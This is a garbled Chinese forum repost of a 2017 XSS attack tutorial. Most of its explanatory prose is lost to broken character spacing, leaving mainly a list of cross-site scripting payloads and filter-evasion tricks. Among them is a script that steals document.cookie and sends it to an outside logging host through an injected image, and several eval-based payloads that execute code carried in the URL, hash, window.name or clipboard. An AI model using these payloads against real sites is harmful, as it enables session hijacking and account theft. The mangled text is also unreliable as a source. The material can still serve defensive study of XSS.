[20710] 2017-04-17_XSS跨站脚本攻击

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2017-04-17_XSS跨站脚本攻击 X S S L e m o n S e c   2 0 1 7 - 0 4 - 1 7 X S S S Q L   X S S 访 S Q L S Q L X S S X S S   b u g   1 X S S   b u g < s c r i p t > a l e r t ( / X S S / ) < / s c r i p t >                                                                                 X S S   b u g , 访 : . : < s c r i p t   s r c   =   h t t p : / / w w w . l a b s e c u r i t y . o r g / x s s b u g . j s > < / s c r i p t > x s s b u g . j s V a r   i m g   =   d o c u m e n t . c r e a t e E l e m e n t ( i m g ) ; I m g . s r c   =   h t t p : / / w w w . l a b s e c u r i t y . o r g / l o g ? + e s c a p e ( d o c u m e n t . c o o k i e ) ; d o c u m e n t . b o d y . a p p e n d C h i l d ( i m g ) ; , c o o k i e l o g . c o o k i e , . ( 使 ) . c o o k i e .   . 使 . C o o k i e 使 使 2 I M G
< i m g   s r c = j a v a c r i p t : a l e r t ( / X S S / ) > < / i m g > X S S . X S S . > . D I V < d i v   s t y l e = w i d t h : 0 ; h e i g h t : 0 ; b a c k g r o u n d : u r l ( j a v a s c r i p t : d o c u m e n t . b o d y . o n l o a d   =   f u n c t i o n ( ) { a l e r t ( / X S S / ) ; } ; > < / d i v > < m a r q u e e > < / m a r q u e e > < m a r q u e e   o n s t a r t = a l e r t ( / X S S / ) > < / m a r q u e e > B . < d i v   s t y l e =   o n m o u s e e n t e r = a l e r t ( / X S S / ) > < / d i v > < i m g   s t y l e = #   s t y l e = T E S T : e - x p r e s s i o n ( a l e r t ( / X S S / ) ) ; > < f o n t   s t y l e   =   T E S T : e - x p r e s s i o n ( a l e r t ( / X S S / ) ) > < / f o n t > < l i   s t y l e   =   T E S T : e - x p r e s s i o n ( a l e r t ( / X S S / ) ) > < / l i > < t a b l e   s t y l e   =   T E S T : e - x p r e s s i o n ( a l e r t ( / X S S / ) ) > < / t a b l e > < a   s t y l e   =   T E S T : e - x p r e s s i o n ( a l e r t ( / X S S / ) ) > < / a > < b   s t y l e   =   T E S T : e - x p r e s s i o n ( a l e r t ( / X S S / ) ) > < / b > < u l   s t y l e   =   T E S T : e - x p r e s s i o n ( a l e r t ( / X S S / ) ) > < / u l > < m a r q u e   t y l e   =   T E S T : e - x p r e s s i o n ( a l e r t ( / X S S / ) ) > < / m a r q u e e > 3 j a v a s c r i p t < i m g   s r c   =   j   a v a   s c r i p t : a l   e r   t ( / X S S / ) > / / / 使 T a b < i m g   s r c   =   j a v a   s c r i p t   : a   l e r   t ( / x s s / ) > < i m g   s r c   =   # / * * / o n e r r o r   =   a l e r t ( / X S S / ) > , 使 使 J S   S t r i n g . f r o m C h a r C o d e ( ) A S C I I , e v a l ( S t r i n g . f r o m C h a r C o d e ( 9 7 , 1 0 8 , 1 0 1 . . . . . ) ) < i n p u t   i d   =   1   t y p e   =   t e x t   v a l u e = / > < i n p u t   i d   =   2   t y p e   =   t e x t   v a l u e   =   / > > a l e r t < ! - - - - > < s c r i p t > ( / X S S / ) ; < / s c r i p t > < i n p u t   i d   =   1   t y p e   =   t e x t   v a l u e =   < s c r i p t > a l e r t ( / X S S / ) < / s c r i p t > / > 使 < b a s e > < b o d y > < b a s e   h r e f = h t t p : / / w w w . l a b s e c u r i t y . o r g / > < i m g   s r c   =   e v i l . j s > < b o d y > 使 b a s e e v i l . j s e v i l . j s . 使 < b a s e > . . 使 < b a s e > , < i m g   s r c = x x x . j s > . 4 使 使 w i n d o w . n a m e < s c r i p t > W i n d o w . n a m e = < s c r i p t   s r c = h t t p : / / w w w . l a b s e c u r i t y . o r g / x s s . j s > < s c r i p t >
W i n d o w . l o c a t i o n = h t t p : / / w w w . x x x x . c o m / x x x . a s p < / s c r i p t > w i n d o w . n a m e . 使 e v a l ( n a m e ) . < d i v   i d = " x " > a l e r t % 2 8 d o c u m e n t . c o o k i e % 2 9 % 3 B < / d i v > < l i m i t e d _ x s s _ p o i n t > e v a l ( u n e s c a p e ( x . i n n e r H T M L ) ) ; < / l i m i t e d _ x s s _ p o i n t > , 使 . X S S . 5 . U R L   H T M L   U R L U R L   X S S d o c u m e n t . U R L / l o c a t i o n . h r e f   8 0   1 .   h t t p : / / w w w . x s s e d s i t e . c o m / x s s e d . p h p ? x = 1 . . . . & a l e r t ( d o c u m e n t . c o o k i e )     2 .   < l i m i t e d _ x s s _ p o i n t > e v a l ( d o c u m e n t . U R L . s u b s t r ( 8 0 ) ) ; < / l i m i t e d _ x s s _ p o i n t >   3 0 1 .   < l i m i t e d _ x s s _ p o i n t > e v a l ( l o c a t i o n . h r e f . s u b s t r ( 8 0 ) ) ; < / l i m i t e d _ x s s _ p o i n t >   3 1 J a v a s c r i p t   S t r i n g   s l i c e 5   s u b s t r   < l i m i t e d _ x s s _ p o i n t > e v a l ( d o c u m e n t . U R L . s l i c e ( 8 0 ) ) ; < / l i m i t e d _ x s s _ p o i n t > 2 9 < l i m i t e d _ x s s _ p o i n t > e v a l ( l o c a t i o n . h r e f . s l i c e ( 8 0 ) ) ; < / l i m i t e d _ x s s _ p o i n t > 3 0 Y E S M S N D   l o c a t i o n   h a s h   # # h a s h # s l i c e 1 .   h t t p : / / w w w . x s s e d s i t e . c o m / x s s e d . p h p ? x = 1 . . . . # a l e r t ( d o c u m e n t . c o o k i e )     2 .   < l i m i t e d _ x s s _ p o i n t > e v a l ( l o c a t i o n . h a s h . s l i c e ( 1 ) ) ; < / l i m i t e d _ x s s _ p o i n t >   2 9 6 . c l i p b o a r d D a t a c l i p b o a r d D a t a   P a y l o a d   X S S   1 .   < s c r i p t >   2 .   c l i p b o a r d D a t a . s e t D a t a ( " t e x t " ,   " a l e r t ( d o c u m e n t . c o o k i e ) " ) ;     3 .   < / s c r i p t >   X S S   < l i m i t e d _ x s s _ p o i n t > e v a l ( c l i p b o a r d D a t a . g e t D a t a ( " t e x t " ) ) ; < / l i m i t e d _ x s s _ p o i n t > 3 6 I E   I E   7  

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则